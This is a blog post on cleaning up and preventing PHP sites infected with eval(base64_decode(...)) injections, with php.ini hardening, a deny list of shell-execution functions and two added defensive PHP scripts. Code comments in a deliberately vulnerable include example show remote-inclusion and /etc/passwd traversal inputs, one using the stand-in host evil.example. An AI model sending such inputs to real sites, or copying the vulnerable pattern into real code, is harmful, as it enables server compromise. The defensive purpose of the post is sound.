Thursday, July 28, 2011

How to prevent base 64 encode attack

SkyHi @ Thursday, July 28, 2011
If you look in the source code of your PHP files and find a call to eval(base64_decode("...")) that you did not put there, your site has been compromised. Usually there is no record of anyone connecting by FTP or SSH, which leaves you scratching your head as to how the attacker got that code onto your server.

How did it get there?

I'm not entirely sure of the vulnerability that lets this hack in, but I do know that after being repeatedly hit with it for several weeks, I managed to stop it entirely after I updated my PHP configuration to forbid the fopen and file_get_contents functions from opening off-site URLs.
This seems to suggest that there was code somewhere on my site that was allowing a malicious user's script to execute on my server, which was able to then write the eval base 64 decode function calls into all of my PHP files. Since I have seen this happen to Wordpress users, it looks like Wordpress has the vulnerability in it somewhere.

How do I stop it?

First, add the following lines to your php.ini file. Check with your hosting provider to find out if and how you can edit php.ini: all three settings are system-level, so they cannot be changed from a script or a .htaccess file, and on shared hosting you may have to ask your host. Restart the web server (or PHP-FPM) afterwards and confirm the new values with phpinfo().
allow_url_fopen = Off
allow_url_include = Off
disable_functions = "apache_child_terminate, apache_setenv, define_syslog_variables, exec, ftp_connect, ftp_exec, ftp_get, ftp_login, ftp_nb_fput, ftp_put, ftp_raw, ftp_rawlist, highlight_file, ini_alter, ini_get_all, ini_restore, mysql_pconnect, openlog, passthru, php_uname, popen, posix_getpwuid, posix_kill, posix_mkfifo, posix_setpgid, posix_setsid, posix_setuid, posix_uname, proc_close, proc_get_status, proc_nice, proc_open, proc_terminate, shell_exec, syslog, system, xmlrpc_entity_decode"
Two caveats about that list. eval is a language construct, not a function, so putting it in disable_functions has no effect: the injected eval(base64_decode()) stub keeps working regardless of this setting. Several names found in lists like this that circulate online (fp, fput, inject_code, the phpAds_* entries) are not PHP functions at all and are simply ignored, and escapeshellarg and escapeshellcmd are the escaping helpers your own code should be using, so all of those are left out here.

Once you have done this, REMOVE EVERY INSTANCE OF THE MALICIOUS CODE FROM YOUR SITE. This attack typically prepends the stub to every PHP file on the site, so a script that finds and strips it is more reliable than editing by hand; keep a copy of one infected file for later analysis. The php.ini changes do not neutralise code that is already on disk, and eval cannot be disabled, so the injected stub keeps running until it is gone. Once the files are clean, change any FTP, database and admin passwords stored on the server, since the injected code had the same access to them as your own scripts.
If your site uses fopen or file_get_contents to load remote URLs, those calls will fail once allow_url_fopen is Off. If your host has the cURL extension installed with PHP, use it instead; cURL is not affected by that setting.
The above changes disable the functions most often abused by injected code. If your site depends on any of them, you will have to either find another way to do the same job or re-enable only the ones you need.
Above all, NEVER pass a user-controlled value (anything taken from $_GET, $_POST, $_COOKIE or a request URL) into fopen, file_get_contents, include or require. That is the hole this kind of injection usually comes through: a script that includes or fetches whatever path or URL the request names (remote or local file inclusion), which with allow_url_include on means running code from a server the attacker controls. Audit your code for every place where request data reaches a file or URL function, and read up on input validation as well as on preventing cross-site scripting (XSS) attacks.
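The following is an added example, not code from the original post, showing the inclusion pattern described above beside a hardened version. The page names (home, about), the feed URL and the pages/ directory are assumptions for illustration; the vulnerable functions are kept only to show what not to do.

```php
<?php
// Added example, not from the original post. "Before": user input reaches
// include and file_get_contents directly. "After": the request only selects
// among files and URLs the application itself names. Requires PHP 7.1+.
declare(strict_types=1);

// VULNERABLE (do not deploy): $page and $url come straight from the request.
function render_page_vulnerable(string $page): void
{
    // ?page=http://evil.example/shell  -> includes a remote file when
    //                                     allow_url_include is On (RFI)
    // ?page=../../../etc/passwd%00     -> local file read on PHP before 5.3.4 (LFI)
    include $page . '.php';
}

function fetch_feed_vulnerable(string $url): string
{
    // Fetches whatever the attacker names, including internal hosts (SSRF).
    return (string) file_get_contents($url);
}

// HARDENED: request tokens map to a fixed allow-list; anything else is rejected.
const PAGES = ['home' => 'pages/home.php', 'about' => 'pages/about.php'];  // assumed layout
const FEEDS = ['news' => 'https://example.com/news.rss'];                   // assumed URL

function render_page(string $page): void
{
    if (!array_key_exists($page, PAGES)) {
        http_response_code(404);
        return;
    }
    include __DIR__ . '/' . PAGES[$page];   // the path is entirely application-controlled
}

function fetch_feed(string $name): string
{
    if (!array_key_exists($name, FEEDS)) {
        throw new InvalidArgumentException('unknown feed');
    }
    // cURL keeps working with allow_url_fopen = Off, so remote fetches live in
    // one audited place instead of being sprinkled through file_get_contents.
    $ch = curl_init(FEEDS[$name]);
    curl_setopt_array($ch, [
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_FOLLOWLOCATION => false,     // a redirect must not change the target
        CURLOPT_PROTOCOLS      => CURLPROTO_HTTPS,
        CURLOPT_TIMEOUT        => 10,
    ]);
    $body = curl_exec($ch);
    if ($body === false) {
        $err = curl_error($ch);
        curl_close($ch);
        throw new RuntimeException('fetch failed: ' . $err);
    }
    curl_close($ch);
    return $body;
}

render_page($_GET['page'] ?? 'home');
```

The point of the allow-list is that the string from the request is only ever used as a lookup key: it never becomes part of a path or URL, so there is nothing for a traversal sequence or a remote URL to do.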

What does it do?

The injected code is base64-encoded PHP source passed to eval, which decodes it and runs it as PHP, so the attacker can execute arbitrary code on your server (the same trick is used in JavaScript, where the decoded payload runs in visitors' browsers). Usually the payload plants malware: hidden iframes, redirects to other sites, spam links, or a backdoor that lets the attacker return. Whenever you see Google warn that a site hosts malware, it may well be an otherwise legitimate site that has been hit with this hack.
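The script below is an added example, not part of the original post, covering both the clean-up step above (strip every instance of the stub from a tree of PHP files) and this section (decode the payload so you can see what it does without running it). It assumes the common shape of the injection, eval(base64_decode("...")) inside its own PHP tag pair prepended to each file; the sample infected file is constructed inline with a harmless payload, and the file name clean.php and the --apply flag are the example's own conventions.

```php
<?php
// Added example (not from the original post): find the injected
// eval(base64_decode("...")) stub in PHP files, decode it for inspection, and
// strip it. Real infections vary, so run it as a dry run first and review every
// match before applying. Requires PHP 7.1+.
declare(strict_types=1);

// eval(base64_decode("<base64>")) with optional surrounding PHP open/close tags.
const INJECT_RE = '/(?:<\?php\s*)?eval\s*\(\s*base64_decode\s*\(\s*[\'"]([A-Za-z0-9+\/=\s]+)[\'"]\s*\)\s*\)\s*;?\s*(?:\?>)?/';

/**
 * Returns [cleaned source, decoded payloads]. Payloads are decoded for
 * inspection only and are never executed.
 */
function strip_eval_base64(string $source): array
{
    $payloads = [];
    $cleaned = preg_replace_callback(INJECT_RE, function (array $m) use (&$payloads): string {
        $raw = base64_decode(preg_replace('/\s+/', '', $m[1]), true);
        $payloads[] = $raw === false ? '(not valid base64: ' . substr($m[1], 0, 40) . ')' : $raw;
        return '';
    }, $source);
    // Drop the blank line the stub leaves behind so the file still starts with <?php.
    return [ltrim($cleaned), $payloads];
}

/** Walks $dir for *.php files; with $dryRun false, strips stubs and keeps a .bak copy. */
function clean_tree(string $dir, bool $dryRun = true): array
{
    $report = [];
    $files  = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($dir, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($files as $file) {
        if (strtolower($file->getExtension()) !== 'php') {
            continue;
        }
        $path = $file->getPathname();
        [$clean, $payloads] = strip_eval_base64((string) file_get_contents($path));
        if ($payloads === []) {
            continue;
        }
        $report[$path] = $payloads;
        if (!$dryRun) {
            copy($path, $path . '.bak');             // keep the evidence for later analysis
            file_put_contents($path, $clean, LOCK_EX);
        }
    }
    return $report;
}

// Constructed sample: a harmless payload wrapped the way the malware wraps it.
$payload  = 'echo "attacker code would run here";';
$infected = '<?php eval(base64_decode("' . base64_encode($payload) . '")); ?>' . "\n"
          . "<?php\necho \"legitimate page\";\n";

[$clean, $found] = strip_eval_base64($infected);
foreach ($found as $p) {
    echo "decoded payload: ", $p, "\n";
}
echo "cleaned source:\n", $clean;

// Usage on a real tree:  php clean.php /var/www/html           (dry run, report only)
//                        php clean.php /var/www/html --apply   (strip stubs, write .bak files)
if (PHP_SAPI === 'cli' && isset($argv[1])) {
    $apply = in_array('--apply', $argv, true);
    foreach (clean_tree($argv[1], !$apply) as $path => $payloads) {
        printf("%s: %d stub(s)%s\n", $path, count($payloads), $apply ? ' removed' : ' found (dry run)');
    }
}
```

Decoded payloads are frequently another layer of the same thing (eval of gzinflate or base64 again); feed the decoded text back through base64_decode or gzinflate by hand until you reach readable PHP, and never run it. Files that still contain a stub after cleaning are a sign the regex does not match that variant, so inspect them manually rather than assuming the tree is clean.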